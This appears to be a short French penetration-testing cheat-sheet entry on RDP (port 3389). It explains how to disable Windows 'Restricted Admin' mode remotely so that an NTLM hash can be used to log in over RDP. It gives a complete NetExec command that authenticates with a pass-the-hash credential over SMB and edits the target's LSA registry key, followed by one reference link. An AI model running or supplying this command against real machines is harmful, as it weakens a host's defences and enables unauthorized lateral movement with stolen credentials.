3389 - RDP

Contourner l’attribut “RestrictedAdmin”

La restriction admin empêche une connexion RDP à l’aide d’un hash NTLM. Il est néanmoins possible de désactiver cette protection à distance pour pouvoir tout de même accéder à la machine.

nxc smb $IP -u "$USER" -H :"$NT_HASH" -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'

Ressources:

• https://medium.com/@jakemcgreevy/pass-the-hash-pth-with-rdp-80595fb38bef